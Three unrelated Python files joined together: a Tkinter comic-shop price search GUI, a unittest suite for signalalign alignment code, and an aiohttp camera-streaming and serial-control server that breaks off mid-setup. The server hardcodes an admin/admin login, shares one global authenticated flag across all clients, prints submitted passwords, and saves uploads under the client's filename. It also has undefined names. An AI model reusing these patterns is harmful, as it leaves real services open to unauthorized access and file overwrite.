#MULTITHREADING
from threading import Thread
#ALL SEARCH FUNCTIONS
from src.comicsetc import comic_etc_search
from src.secrethq import secrethq_search
from src.incognito import incognito_search
from src.allstar import allstar_search
from src.impact import impact_search
from src.bookdepository import bookdepository_search
from src.amazon import amazon_search
from src.booktopia import booktopia_search
from src.comicsrus import comicsrus_search
from src.popcultcha import pop_cultcha_search
from src.macs import macs_search
from src.area52 import area_search
from src.minotaur import minotaur_search
from src.greenlight import greenlight_search
#FILTERING
from src.filtering import filtering_results
#MISC
from sys import exit
from pandas import DataFrame
from webbrowser import open
from sys import platform
# GLOBAL THAT WILL HOLD THE FINAL filtering_results
final_result = []
##### DEFINE MAIN ######
def main():
global final_result
# COLLECTION OF SEARCHED
not_evil_search = [comic_etc_search, secrethq_search, incognito_search, \
allstar_search, impact_search, comicsrus_search, pop_cultcha_search, \
macs_search, area_search, minotaur_search, greenlight_search]
evil_search = [comic_etc_search, secrethq_search, incognito_search, \
allstar_search, impact_search, comicsrus_search, pop_cultcha_search, \
macs_search, area_search, minotaur_search, greenlight_search, \
bookdepository_search, booktopia_search, amazon_search]
############## START PROCESS OPTIONS ################
# CONTEXT MENU
def make_textmenu(root):
global the_menu
the_menu = Menu(root, tearoff=0)
the_menu.add_command(label="Cut")
the_menu.add_command(label="Copy")
the_menu.add_command(label="Paste")
the_menu.add_separator()
the_menu.add_command(label="Select all")
def callback_select_all(event):
# select text after 50ms
root.after(50, lambda:event.widget.select_range(0, 'end'))
def show_textmenu(event):
e_widget = event.widget
the_menu.entryconfigure("Cut",command=lambda: e_widget.event_generate("<<Cut>>"))
the_menu.entryconfigure("Copy",command=lambda: e_widget.event_generate("<<Copy>>"))
the_menu.entryconfigure("Paste",command=lambda: e_widget.event_generate("<<Paste>>"))
the_menu.entryconfigure("Select all",command=lambda: e_widget.select_range(0, 'end'))
the_menu.tk.call("tk_popup", the_menu, event.x_root, event.y_root)
def launch_threaded(func):
global final_result
Thread(target = func, daemon=True).start()
def open_link(a):
curItem = result_field.focus()
try:
url_to_open = result_field.item(curItem)["values"][1]
print(url_to_open)
open(url_to_open)
except IndexError:
pass
def click_search(event=None):
global final_result
# CHECK IF ISSUE/VOL IS NUMERIC
try:
volume_argument = int(vol_selector.get()) # THERE IS A VOLUME AND IT IS A NUMBER
except ValueError:
if vol_selector.get() == "": # THERE IS NOTHING IN THE BOX:
volume_argument = 0
else: # THERE IS TEXT IN THERE
status_label_text.set("Volume / Issue MUST be a number")
status_label.config(text=status_label_text.get())
return # STOP HERE
if search_term.get() == "": # IF NOTHING IN SEARCH BAR
return
final_result = [] # RESET EVERY NEW SEARCH
#DEACTIVATE EVERYTHING
search_bar["state"] = DISABLED
search_button["state"] = DISABLED
type_listbox["state"] = DISABLED
volume_entry["state"] = DISABLED
evil_checkbutton["state"] = DISABLED
status_label_text.set("LOOKING FOR COMICS")
status_label.config(text=status_label_text.get())
# GET ALL PARAMETERS
#search_term.set("old man hawkeye")
search_term_argument = search_term.get()
type_argument = type_selector.get()
evil_argument = evil_selector.get()
# PROCESS ARGUMENTS:
if volume_argument == 0:
volume_argument = None
if type_argument == "":
type_argument = None
print("ARGUMENTS ARE : {} | {} | {} | {}".format(search_term_argument,type_argument, volume_argument, evil_argument))
if evil_argument == True:
list_of_shops = evil_search
else:
list_of_shops = not_evil_search
final_result_holder = []
thread_list = []
# MULTITHREADING ?
def threaded_search(shop_search_function, search_term, result_holder):
final_result_holder.append(shop_search_function(search_term))
for shop_function_search in list_of_shops:
#print(shop_function_search)
#print("Creating Threads")
#print(search_term_argument)
t = Thread(target=threaded_search, args=(shop_function_search,search_term_argument,final_result_holder))
thread_list.append(t)
#print(thread_list)
#print(len(thread_list))
for search_thread in thread_list:
print("Starting_thread {}".format(search_thread))
search_thread.start()
for search_thread in thread_list:
print("WAIT FOR FINISH {}".format(search_thread))
search_thread.join()
final_result = [item for sublist in final_result_holder for item in sublist if sublist != []]
if volume_argument or type_argument:
final_result = filtering_results(final_result, type_argument, volume_argument)
# REORDER
final_result = sorted(final_result, key=lambda k: k['price'])
### PRINT RESULTS ####
print_df = DataFrame.from_dict(final_result)
print(print_df)
# TRY Treeview
#delete previous Treeview
result_field.delete(*result_field.get_children())
for i in range(len(print_df.index.values)):
result_field.insert('','end',value=tuple(print_df.iloc[i].values))
# columns = ["title", "url", "price", "shop", "availability"]
result_field.column("title",width=200,anchor='center')
result_field.column("url",width=100, anchor="center")
result_field.column("price",width=150, anchor="center")
result_field.column("shop",width=150, anchor="center")
result_field.column("availability",width=150, anchor="center")
result_field.heading("title",text="Title")
result_field.heading("url",text="URL")
result_field.heading("price",text="Price")
result_field.heading("shop",text="Shop")
result_field.heading("availability",text="Availability")
vsb = ttk.Scrollbar(root, orient="vertical", command=result_field.yview)
result_field.configure(yscrollcommand=vsb.set)
vsb.grid(column=7, row = 1, rowspan = 20, sticky=E+S+N)
result_field.bind('<Double-Button-1>', open_link)
#ARCITAVE EVERYTHING
search_bar["state"] = NORMAL
search_button["state"] = NORMAL
type_listbox["state"] = "readonly"
volume_entry["state"] = NORMAL
evil_checkbutton["state"] = NORMAL
status_label_text.set("DONE")
status_label.config(text=status_label_text.get())
############## END PROCESSING OPTIONS################
# COLOR SETUP
bg_left = "light grey"
bg_rigt = "black"
# SETUP BASICS FOR GUI
root = Tk() # ROOT IS TOP LEVEL WINDOW
root.configure(background=bg_left)
root.title("Oz Comics Search") # TITLE OF THE WINDOW
root.minsize(600,300)
#TODO ADD iCON THAT WORKS
try:
root.iconbitmap( './pic/icon.ico')
except TclError:
pass
#root.geometry("1080x600") # SIZE AT STARTUP
make_textmenu(root)
# bind the feature to all Entry widget
if platform == "darwin":
root.bind_class("Entry", "<Button-2><ButtonRelease-2>", show_textmenu)
root.bind_class("Entry", "<Control-a>", callback_select_all)
else:
root.bind_class("Entry", "<Button-3><ButtonRelease-3>", show_textmenu)
root.bind_class("Entry", "<Control-a>", callback_select_all)
# LEFT PANEL
############## START LEFT OPTIONS ################
#creates a frame that is a child of object named 'root'
left_frame = Frame(master=root, bg=bg_left, relief = "raised")
left_frame.grid(row = 1, column = 1)
##### SETUP ALL VARIABLES #####
type_selector = StringVar() # STORE VALUE OF TYPE SELECTION
vol_selector = StringVar() # STORE VALUE OF VOLUME SELECTION
evil_selector = BooleanVar() # STORE VALUE OF EVIL ON/OFF
search_term = StringVar() #IS THE ACTUAL SEARCH TERM
# LOGO ROW = 1
try:
canvas = Canvas(left_frame, width = 300, height = 100, bg = bg_left)
canvas.grid(row=1, column=1, columnspan=2)
img = PhotoImage(file="./pic/logo.png")
canvas.create_image(0,0, anchor=NW, image=img)
except TclError:
canvas.create_text(150,50,text = "Oz Comics Search", justify = CENTER, font = 'Helvetica 24')
# LABEL ROW = 2
search_label = Label(left_frame, text="Search for trade, issue, graphic novels...", bg = bg_left)
search_label.grid(row = 2, column = 1)
# SEARCH ROW = 3
search_row = 3
# SEARCH BAR: ENTRY
search_bar = Entry(left_frame, textvariable = search_term)
search_bar.grid(row=search_row,column=1, padx = 0, columnspan=2, sticky = W+E)
# SEARCH BUTTON: BUTTON
search_button = Button(left_frame, text = "Search", bg = bg_left, command = lambda: launch_threaded(click_search))
search_button.grid(row=search_row+1,column=1,columnspan=2)
# OPTION LABEL ROW = 5
option_row = 5
type_label = Label(left_frame, text= "Choose Book Type", bg = bg_left)
type_label.grid(row=option_row,column=1)
volume_label = Label(left_frame, text= "Volume / Issue #", bg = bg_left)
volume_label.grid(row=option_row,column=2)
# OPTION ROW = 6
option_row = 6
#TYPE SELECTOR = COMBOBOX
type_selector = StringVar()
type_list = ["", "trade", "issue"]
type_listbox = ttk.Combobox(left_frame, cursor = "hand2", justify = CENTER, textvariable=type_selector, state="readonly")
type_listbox['values'] = type_list
type_listbox.grid(row = option_row, column = 1)
# VOLUME SELECTOR = Entry
volume_entry = Entry(left_frame, textvariable = vol_selector)
volume_entry.grid(row=option_row,column=2)
# Check Button evil mode
check_evil_row = 7
evil_checkbutton = Checkbutton(left_frame, bg = bg_left, variable = evil_selector, onvalue = True, offvalue = False)
evil_checkbutton.grid(row = check_evil_row, column = 1, sticky = E)
evil_label = Label(left_frame, text="Include Amazon AU, Bookdepository, Booktopia", bg = bg_left)
evil_label.grid(row = check_evil_row, column = 2)
# STATUS LABEL
status_label_text = StringVar()
status_label = Label(left_frame, text = status_label_text.get(), bg = bg_left)
status_label.grid(row = check_evil_row + 1, column=1, columnspan=2)
############## END LEFT OPTIONS ################
search_bar.bind('<Return>', lambda event, func = click_search: launch_threaded(func))
############## START RIGHT RESULTS ################
#creates a frame that is a child of object named 'root'
#right_frame = Frame(master=root, bg=bg_rigt, relief = "raised")
#right_frame.grid(column = 3, row = 1, columnspan=4, rowspan=15, sticky=W+E+N+S)
columns = ["title", "url", "price", "shop", "availability"]
result_field = ttk.Treeview(master=root,show="headings", columns=columns)
result_field.grid(column = 3, row = 1, columnspan=1, rowspan = 5 ,sticky=W+E+S+N)
root.columnconfigure(3,weight=1)
root.rowconfigure(5,weight=1)
############## END RIGHT RESULTS ################
###### RUN ######
root.mainloop()
if __name__ == '__main__':
main()
|
test_build_alignments.py
|
#!/usr/bin/env python
"""Test trainModels.py"""
########################################################################
# File: test_trainModels.py
# executable: test_trainModels.py
#
# Author: Andrew Bailey
# History: 5/21/18 Created
########################################################################
import unittest
import tempfile
import numpy as np
from signalalign.build_alignments import *
from signalalign.train.trainModels import get_kmers, multiprocess_make_kmer_assignment_tables
from py3helpers.utils import time_it, count_lines_in_file, captured_output
from embed import bindings
class TrainSignalAlignTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(TrainSignalAlignTest, cls).setUpClass()
cls.HOME = '/'.join(os.path.abspath(__file__).split("/")[:-4])
cls.reference = os.path.join(cls.HOME, "tests/test_sequences/pUC19_SspI_Zymo.fa")
cls.ecoli_reference = os.path.join(cls.HOME, "tests/test_sequences/E.coli_K12.fasta")
cls.ecoli_bam = os.path.join(cls.HOME, "tests/minion_test_reads/canonical_ecoli_R9/canonical_ecoli.bam")
cls.ecoli_readdb = os.path.join(cls.HOME, "tests/minion_test_reads/canonical_ecoli_R9/canonical_ecoli.readdb")
cls.fast5_dir = os.path.join(cls.HOME, "tests/minion_test_reads/canonical_ecoli_R9")
cls.files = [
"miten_PC_20160820_FNFAD20259_MN17223_mux_scan_AMS_158_R9_WGA_Ecoli_08_20_16_83098_ch138_read23_"
"strand.fast5",
"miten_PC_20160820_FNFAD20259_MN17223_sequencing_run_AMS_158_R9_WGA_Ecoli_08_20_16_43623_ch101_"
"read456_strand.fast5",
"miten_PC_20160820_FNFAD20259_MN17223_sequencing_run_AMS_158_R9_WGA_Ecoli_08_20_16_43623_ch101_"
"read544_strand1.fast5",
"miten_PC_20160820_FNFAD20259_MN17223_sequencing_run_AMS_158_R9_WGA_Ecoli_08_20_16_43623_ch103_"
"read333_strand1.fast5"]
cls.fast5_paths = [os.path.join(cls.fast5_dir, f) for f in os.listdir(cls.fast5_dir)
if os.path.isfile(os.path.join(cls.fast5_dir, f))]
cls.alignments_dir = os.path.join(cls.HOME, "tests/test_alignments/pUC_6mer_tempFiles_alignment")
cls.alignments_path = os.path.join(cls.HOME,
"tests/test_alignments/pUC_6mer_tempFiles_alignment/"
"07b1cae8-9b48-426f-a2a5-b07437d5a58e.sm.backward.tsv")
cls.assignment_path = os.path.join(cls.HOME,
"tests/test_assignment_files/"
"d6160b0b-a35e-43b5-947f-adaa1abade28.sm.assignments.tsv")
def test_add_to_queue(self):
with captured_output() as (_, _):
work_queue = Manager().Queue()
worker_count = 2
for w in range(worker_count):
p = Process(target=add_to_queue, args=(work_queue,), daemon=True)
p.start()
data = get_from_queue(work_queue, worker_count)
# print(data)
self.assertSequenceEqual(sorted(list(range(10)) + list(range(10))), sorted(data))
def test_alignment_file_to_queues(self):
with captured_output() as (_, _):
max_size = 10
work_queues = [Manager().Queue(max_size) for _ in range(2)]
alignment_file_to_queues(self.alignments_path, work_queues, min_prob=0.9)
first_one = work_queues[0].get()
self.assertSequenceEqual(first_one, ["TGAAAA", "t", 75.375476, 0.999576])
def test_assignment_file_to_queues(self):
with captured_output() as (_, _):
max_size = 10
work_queues = [Manager().Queue(max_size) for _ in range(2)]
assignment_file_to_queues(self.assignment_path, work_queues, min_prob=0.9)
first_one = work_queues[0].get()
self.assertSequenceEqual(first_one, ["GCCTTA", "t", 83.709275, 1.000000])
def test_get_nlargest_queue(self):
with captured_output() as (_, _):
work_queue = Manager().Queue()
all_data = []
for x in np.random.randint(100, size=100):
work_queue.put(x)
all_data.append(x)
data = get_nlargest_queue(work_queue, topn=100)
self.assertSequenceEqual(data, sorted(all_data)[::-1])
def test_get_nlargest_alignment_queue(self):
with captured_output() as (_, _):
work_queue = Manager().Queue()
all_data = []
for x in np.random.randint(100, size=100):
data = ["GCCTTA", "t", "83.709275", x]
work_queue.put(data)
all_data.append(data)
data = get_nlargest_alignment_queue(work_queue, topn=100)
self.assertSequenceEqual(data, sorted(all_data)[::-1])
def test_make_kmer_directories(self):
with captured_output() as (_, _):
with tempfile.TemporaryDirectory() as temdir:
dirs = make_kmer_directories(temdir, "ACGT", 6, complement=False)
for new_dir in dirs:
self.assertTrue(os.path.isdir(new_dir))
def test_split_assignment_file(self):
with captured_output() as (_, _):
with tempfile.TemporaryDirectory() as temdir:
dirs = make_kmer_directories(temdir, "ACGT", 6, complement=False)
split_assignment_file(self.assignment_path, dirs, "ACGT", 6, 4, min_prob=0.0)
self.assertTrue(
os.path.exists(os.path.join(os.path.join(temdir, "GCCTTA"), os.path.basename(self.assignment_path))))
with tempfile.TemporaryDirectory() as temdir:
dirs = make_kmer_directories(temdir, "ACGT", 6, complement=False)
split_assignment_file(self.alignments_path, dirs, "ACGT", 6, 4, min_prob=0.0, alignment=True)
self.assertTrue(
os.path.exists(os.path.join(os.path.join(temdir, "TGAAAA"), os.path.basename(self.alignments_path))))
def test_multiprocess_split_assignment_file(self):
with captured_output() as (_, _):
with tempfile.TemporaryDirectory() as temdir:
dirs = make_kmer_directories(temdir, "ACGT", 6, complement=False)
multiprocess_split_sa_tsv_file([self.assignment_path], dirs, "ACGT", 6, min_prob=0.0, worker_count=1)
self.assertTrue(os.path.exists(os.path.join(os.path.join(temdir, "GCCTTA"),
os.path.basename(self.assignment_path))))
with tempfile.TemporaryDirectory() as temdir:
dirs = make_kmer_directories(temdir, "ACGT", 6, complement=True)
multiprocess_split_sa_tsv_file([self.alignments_path], dirs, "ACGT", 6, min_prob=0.0,
worker_count=1, alignment=True)
self.assertTrue(
os.path.exists(os.path.join(os.path.join(temdir, "TGAAAA"),
os.path.basename(self.alignments_path))))
def test_get_top_kmers_from_directory(self):
with captured_output() as (_, _):
with tempfile.TemporaryDirectory() as temdir:
dirs = make_kmer_directories(temdir, "ACGT", 6, complement=False)
split_assignment_file(self.assignment_path, dirs, "ACGT", 6, 4, min_prob=0.0)
get_top_kmers_from_directory(dirs[2428], temdir, 10, random=False)
data = []
with open(os.path.join(temdir, "GCCTTA.tsv"), "r") as fh:
line = fh.readline()
data.append(line.split()[3])
self.assertSequenceEqual(sorted(data)[::-1], data)
def test_multiprocess_get_top_kmers_from_directory(self):
with captured_output() as (_, _):
with tempfile.TemporaryDirectory() as temdir:
dirs = make_kmer_directories(temdir, "ACGT", 6, complement=False)
split_assignment_file(self.assignment_path, dirs, "ACGT", 6, 4, min_prob=0.0)
multiprocess_get_top_kmers_from_directory(dirs, temdir, 10, random=False)
data = []
with open(os.path.join(temdir, "GCCTTA.tsv"), "r") as fh:
line = fh.readline()
data.append(line.split()[3])
self.assertSequenceEqual(sorted(data)[::-1], data)
def test_generate_top_n_kmers_from_sa_output(self):
with captured_output() as (_, _):
with tempfile.TemporaryDirectory() as temdir:
output_file = os.path.join(temdir, "built_alignment.tsv")
generate_top_n_kmers_from_sa_output([self.alignments_path], temdir, output_file, 10,
kmer_len=6, min_prob=0.8, worker_count=1, random=False)
def test_generate_buildAlignments4(self):
with captured_output() as (_, _):
kmers = get_kmers(6, alphabet="ATGC")
data_files = [self.alignments_path]
data, time1 = time_it(multiprocess_make_kmer_assignment_tables,
data_files, kmers,
{"t", "c"}, 0.0, True, True, 10, 2)
with tempfile.TemporaryDirectory() as temdir:
output_file = os.path.join(temdir, "built_alignment.tsv")
data2, time2 = time_it(generate_top_n_kmers_from_sa_output,
data_files, temdir, output_file, 10, "ACGT", 6, 0.0, 8, False, True, False, True)
# get kmers associated with each sample
num_lines = len(list(open(output_file)))
self.assertEqual(len(data.index), num_lines)
self.assertLess(time2, time1)
def test_generate_buildAlignments5(self):
with captured_output() as (_, _):
data_files = [self.assignment_path]
data, time1 = time_it(multiprocess_make_kmer_assignment_tables,
data_files, get_kmers(6, alphabet="ATGC"),
{"t", "c"}, 0.5, True, False, 10, 2)
# get kmers associated with each sample
lines = len(data.index)
with tempfile.TemporaryDirectory() as temdir:
out_path = os.path.join(temdir, "test.tsv")
log_path = os.path.join(temdir, "log.tsv")
data2, time2 = time_it(bindings.generate_master_kmer_table,
[self.assignment_path], out_path, log_path, 10, "ACGT", 0.5, 2, False)
# get kmers associated with each sample
lines2 = count_lines_in_file(out_path)
self.assertLess(time2, time1)
self.assertEqual(lines, lines2)
if __name__ == '__main__':
unittest.main()
|
main.py
|
#!/usr/bin/env python3
import logging,os,asyncio,cv2,aiojobs,aiofiles,json, threading,dotenv,argparse,aiohttp,aiohttp_session ,time,serial,serial_asyncio,binascii
from aiohttp import web, MultipartWriter
from queue import Queue
from aiohttp.web import middleware
#from objbrowser import browse
from aiojobs.aiohttp import setup, spawn
from concurrent.futures import ThreadPoolExecutor,ProcessPoolExecutor
from functools import wraps
# logging.basicConfig(format="[%(asctime)s] p%(process)s {%(pathname)s:%(lineno)d} %(levelname)s - %(message)s")
# logger = logging.getLogger('async')
# logger.setLevel(logging.DEBUG)
logging.basicConfig(filename="firefly.log",filemode='w',level=logging.DEBUG)
#logging.basicConfig(level=getattr(logging, args.log))
INDEX_File=os.path.join(os.path.dirname(__file__), 'index.html'); logging.debug(INDEX_File)
LOGIN_File=os.path.join(os.path.dirname(__file__), 'login.html'); logging.debug(LOGIN_File)
STATIC_DIR=os.path.join(os.path.dirname(__file__), 'static');logging.debug(STATIC_DIR)
PORT='COM7'#'/dev/ttyS0'
GlobalAPP=_reader=_writer=comPort=None
BAUDRATE=57600
IsAucheticated = False
VERBOSE_DEBUG = False
DEFAULT_LOG_LEVEL = "INFO"
DEFAULT_DELAY = 0.01
DEFAULT_STORAGE = "./photos"
ALLOWED_LOG_LEVELS = (
"CRITICAL",
"FATAL",
"ERROR",
"WARNING",
"WARN",
"INFO",
"DEBUG",
"NOTSET",
)
def thread_decorator(func):
@wraps(func)
def thred_maker(*args,**kwargs):
t=threading.Thread(target=func,args=args,kwargs=kwargs)
t.start()
return t
return thred_maker
def get_args():
parser = argparse.ArgumentParser( description="Aiohttp based streaming service", )
parser.add_argument( "-s", "--storage", help="Path to photo storage root directory", required=False, type=str, default=os.getenv("STORAGE" , DEFAULT_STORAGE),)
parser.add_argument( "-d", "--delay" , help="Interval between sending the chunks in seconds", required=False, type=float, default=os.getenv("DELAY" , DEFAULT_DELAY), )
parser.add_argument( "-l", "--log" , help="Loging level", required=False, type=str, choices=ALLOWED_LOG_LEVELS, default=os.getenv("LOG_LEVEL", DEFAULT_LOG_LEVEL), )
args = parser.parse_args()
return args
class VideoCaptureThreading:
def __init__(self, src=0, width=640, height=480):
self.src = src
self.cap = cv2.VideoCapture(self.src)
self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
self.grabbed, self.frame = self.cap.read()
self.started = False
self.read_lock = threading.Lock()
def set(self, var1, var2):
self.cap.set(var1, var2)
def start(self):
if self.started:
print('[!] Threaded video capturing has already been started.')
return None
self.started = True
self.thread = threading.Thread(target=self.update, args=())
self.thread.start()
return self
def update(self):
while self.started:
grabbed, frame = self.cap.read()
with self.read_lock:
self.grabbed = grabbed
self.frame = frame
def read(self):
with self.read_lock:
frame = self.frame.copy()
grabbed = self.grabbed
return grabbed, frame
def stop(self):
self.started = False
self.thread.join()
def __exit__(self, exec_type, exc_value, traceback):
self.cap.release()
class VideoCamera(object):
def __init__(self):
self.logger = logging.getLogger(__name__)
""""""; logging.basicConfig(level=logging.INFO,format='[%(levelname)s] (%(threadName)-10s) %(message)s',)
self._raw_channel = Queue()
self.video = cv2.VideoCapture(0);logging.debug("start camera");print("start camera")
self.encode_param = (int(cv2.IMWRITE_JPEG_QUALITY), 90)
def __del__(self):
self.video.release();print("video.release")
def delete(self):
self.video.release();print("video.release")
def get_frame(self):
success, image = self.video.read()
# We are using Motion JPEG, but OpenCV defaults to capture raw images,
# so we must encode it into JPEG in order to correctly display the
# video stream.
try:
ret, jpeg = cv2.imencode('.jpg', image)
except Exception as e:
logging.debug('Exception encoding image ' + str(e))
return None
#self._raw_channel.put(jpeg)
return jpeg.tobytes()
@middleware
async def authorize(request, handler):
print("Do Auchetication=");
logging.debug("Do Auchetication=",request.path.startswith('/login')) #False
session = await aiohttp_session.get_session(request)
logging.debug("Dsession uid=",session.get('uid'))
if (not session.get('uid')) and (not request.path.startswith('/login')):
url = request.app.router['login'].url_for()
log.debug('redirecting to {}'.format(str(url)))
raise web.HTTPFound(url)
response = await handler(request)
return response
def redirect(request, router_name):
print("redirect");
url = request.app.router[router_name].url_for()
logging.debug("redirect url =",url) #False
log.debug('redirecting to {}'.format(url))
raise web.HTTPFound(url)
'''middleware redirects to Login in case there is no 'uid' found in the request's session'''
class Login(web.View):
async def get(self):
session = await get_session(self.request)
uid = 'user{0}'.format(random.randint(1, 1001))
uids = self.request.app['uids']
while uid in uids:
uid = 'user{0}'.format(random.randint(1, 1001))
uids.append(uid)
self.request.app['uids'] = uids
session['uid'] = uid
log.debug(uid)
redirect(self.request, '/')
class WSClient(object):
def __init__(self, ws):
global WSID
self.id = WSID
self.ws = ws
WSID+=1
async def send(self,msg):
await self.ws.send_str(msg)
class WSHandler:
def __init__(self):
self.ws_list = set()
async def ws_handler(self, request):
ws = web.WebSocketResponse()
await ws.prepare(request)
client = WSClient(ws)
self.ws_list.add(client)
print('Websocket connection ready')
print('Total clients: ' , self.ws_list, str(len(self.ws_list)))
#Total clients:{<__main__.WSClient object at 0xF28>, <__main__.WSClient object at 0x630>, <__main__.WSClient object at 0xD58F6D8>} 3
for c in self.ws_list:
print( c.ws,c.id )
#<WebSocketResponse Switching Protocols GET /ws > 1
#<WebSocketResponse Switching Protocols GET /ws > 0
#<WebSocketResponse Switching Protocols GET /ws > 2
await self._send_user_list()
#loop---------
async for msg in ws:
if msg.type == aiohttp.WSMsgType.TEXT:
Income=msg.data;
parsing(Income) #message = msg.json()
await ws.send_str("got your message website")
#---------loop
self.ws_list.remove(client)
print("Removing... " + str(len(self.ws_list)))
return ws
async def _send_user_list(self):
token = [c.id for c in self.ws_list if c.id]
for c in self.ws_list:
await c.ws.send_str('LIST*{}'.format(token));print('we send LIST*{}'.format(token) )#LIST*[4, 2, 3, 1]
return
async def uploadFile(request):
print("uploadFile");
reader = await request.multipart()
# /!\ Don't forget to validate your inputs /!\
# reader.next() will `yield` the fields of your form
field = await reader.next()
assert field.name == 'name'
name = await field.read(decode=True)
field = await reader.next()
assert field.name == 'mp3'
filename = field.filename
# You cannot rely on Content-Length if transfer is chunked.
size = 0
with open(os.path.join('/spool/yarrr-media/mp3/', filename), 'wb') as f:
while True:
chunk = await field.read_chunk() # 8192 bytes by default.
if not chunk:
break
size += len(chunk)
f.write(chunk)
return web.Response(text='{} sized of {} successfully stored'''.format(filename, size))
async def mjpeg_handler(request):
print("mjpeg_handler=",request.url);
#browse(locals(), 'locals()')
#param1=request.get('client');
com = request.rel_url.query['com']; print("com=",com)
if com=='start':
# param2 = request.rel_url.query['age']
# result = "name: {}, age: {}".format(param1, param2)
boundary = "boundarydonotcross";
responseImage = web.StreamResponse(status=200, reason='OK', headers={'Content-Type': 'multipart/x-mixed-replace; ''boundary=--%s' % boundary,})
#responseImage.content_type = 'multipart/x-mixed-replace;boundary=ffserver'
await responseImage.prepare(request) #Send HTTP header. You should not change any header data after calling this method.
VC = cv2.VideoCapture(0);
request.app["camera"]=VC
encode_param = (int(cv2.IMWRITE_JPEG_QUALITY), 90)
request.app["streaming"].add(responseImage)
while True:
try:
_, frame = VC.read(); #await
if frame is None:
break
with MultipartWriter('image/jpeg', boundary=boundary) as mpwriter:
result, encimg = cv2.imencode('.jpg', frame, encode_param)
data = encimg.tostring()
mpwriter.append(data, {'Content-Type': 'image/jpeg'})
await mpwriter.write(responseImage, close_boundary=False);print("next frame");
await asyncio.sleep(0.010)#await responseImage.drain()
except asyncio.CancelledError as e:
request.app["streaming"].remove(responseImage);request.app["camera"].remove(VC)
print("Exit camera mjpeg_handler");
VC.shutdown();
return responseImage
else :
print("streaming_clear",request.app["camera"]);
if request.app["camera"] is not None:
request.app["camera"].release();
return web.Response();#return HTTPNotFound(text='No file found')
#await shut_down(request)
# async def startcamera(request):
# scheduler = await aiojobs.create_scheduler()
# await scheduler.spawn(mjpeg_handler(request))
async def stopcamera(request):
print("stocamera")
camera=request.app['camera']
await camera.delete()
return response
def parsing(data):
print("parsing websocket data=",data);#data= <WebSocketResponse Switching Protocols GET /ws >
#await GlobalWS.send_str("AKA")
async def websocket_handler(request):
#logging.debug("this is another one= ",request.app["GlobalWS"])
if request.app["GlobalWS"] != None:
print(" return, this is more than one client:{} ".format(request.app["GlobalWS"]))
return
print('--------------------Websocket connection starting>>>>>>>>>>>>>>>>>>>')
ws = web.WebSocketResponse()
await ws.prepare(request)
request.app["GlobalWS"]=1000
logging.debug('------- -----Websocket connection ready------- -----')
request.app["websockets"].add(ws)
async for msg in ws:
# this remain live
if msg.type == aiohttp.WSMsgType.TEXT:
Income=msg.data;
if(_writer):
_writer.write(Income)
print(Income)
#check serial
request.app["GlobalWS"]=None;#.remove(ws)
request.app['websockets'].discard(ws)
return ws
async def websockets_clear(app):
print("websockets_clear");
for ws in app['websockets']:
await ws.close()
app['websockets'].clear()
app['streaming'].clear();app["camera"].clear();print("streaming_clear done");
async def index(request):
logging.debug("index simple handler")
return web.Response(text='<div><img src="/imageH" /></div><p> video </p><div><img src="/imageV" /></div>', content_type='text/html')
async def handle_index_page(request):
global IsAucheticated
print(">>>>>>....IsAucheticated = ?",IsAucheticated)
if not IsAucheticated:
return await handle_login_page(request)
print("handle_index_page");
request.app["GlobalWS"] = None
if VERBOSE_DEBUG:
str="index_page method={},host={},path={},headers={},transport={},cookies={}".format(request.method,request.host,request.path,request.headers,request.transport,request.cookies,)
logging.debug(str);print(str)#clientIP = request.headers['X-Forwarded-For'] #password = None " url=",request.app.router['login'].url_for());# logging.debug(request.headers)
async with aiofiles.open(INDEX_File, mode='r') as index_file:
index_contents = await index_file.read()
return web.Response(text=index_contents, content_type='text/html')
async def handle_login_page(request):
#print("handle_login_page=",request.url_for());
if VERBOSE_DEBUG:
str="login_page method={},host={},path={},headers={},transport={},cookies={}".format(request.method,request.host,request.path,request.headers,request.transport,request.cookies,)
logging.debug(str);print(str)
async with aiofiles.open(LOGIN_File, mode='r') as index_file:
index_contents = await index_file.read()
return web.Response(text=index_contents, content_type='text/html')
async def handle_authenticate(request):
print("handle_authenticate");
global IsAucheticated
if VERBOSE_DEBUG:
str="authenticate method={},host={},path={},headers={},transport={},cookies={}".format(request.method,request.host,request.path,request.headers,request.transport,request.cookies,)
logging.debug(str);print(str)
data=await request.post() #<MultiDictProxy('uname': 'xxx', 'psw': 'c', 'remember': 'on')>
#user=data.get('uname');password=data.get('psw')
user = data['uname']; password = data['psw']
print("username =",user," password =",password )
if user=="admin" and password=="admin":
IsAucheticated = True
logging.debug("login successful");print("login successful")
return await handle_index_page(request)
else :
logging.debug("login failed");print("login failed")
return await handle_login_page(request)
# for key,val in data.items():
# logging.debug(key, "=>", val)
#browse(locals(), 'locals()')
async def serialWriteLoop(f):
global _writer
print("send serialRead")
message =b'>*>p0x0800'
while True:
print(b'>*>p0x0800')
if(_writer):
for b in message:
_writer.write(bytes([b]))
await asyncio.sleep(1/f);
# message = b'foo\nbar\nbaz\nqux\n'
# for b in message:
# self.transport.serial.write(bytes([b]))
# print(f'Writer sent: {bytes([b])}')
async def SerialReader(loop):
global _reader,_writer
_reader,_writer = serial_asyncio.open_serial_connection(url=PORT, baudrate=BAUDRATE,loop=loop)
print("_reader",_reader);print("_writer",_writer);print(b'>*>p0x0800')
_writer.write(b'>*>p0x0800')
while True:
line = await _reader.readline();print( len(line))
#line = line.decode("utf-8").strip()
#print(bytes(line, 'utf-8'))
for x in GlobalAPP['websockets']:
await x.send_str(line)
def SerialReceiveThread():
print (comPort.is_open)
if comPort.is_open:
while True:
size = comPort.inWaiting()
if size:
data = comPort.read(size)
print (data)
else:
pass#print ('no data')
else:
print ('comPort not open')
def PeriodicWriteSerialThread(f=1):
while comPort:
print(b'>*>p0x0800')#pitch=0,roll=0,yaw=0,thrust=0
comPort.write(b'>*>p0x0800')#CTRL_INPUT(thrust=F_Tmap(Thrust)))
time.sleep(1/f)
async def setup_server(loop, address, port):
global GlobalAPP
GlobalAPP=app = web.Application(loop=loop)
app.router.add_route('GET', "/login", handle_login_page) #login?uname=asd&psw=asd&remember=on
app.router.add_route('POST', "/", handle_authenticate)
app.router.add_route('GET', "/", handle_index_page)
app.router.add_static('/static/', path=STATIC_DIR, name='static')
app.router.add_route('GET', "/image", mjpeg_handler)
app.router.add_route('GET', "/stopcamera", stopcamera)
#wshandler = WSHandler()
#app.router.add_get('/ws', wshandler.ws_handler)
app.router.add_route('GET', '/ws', websocket_handler)
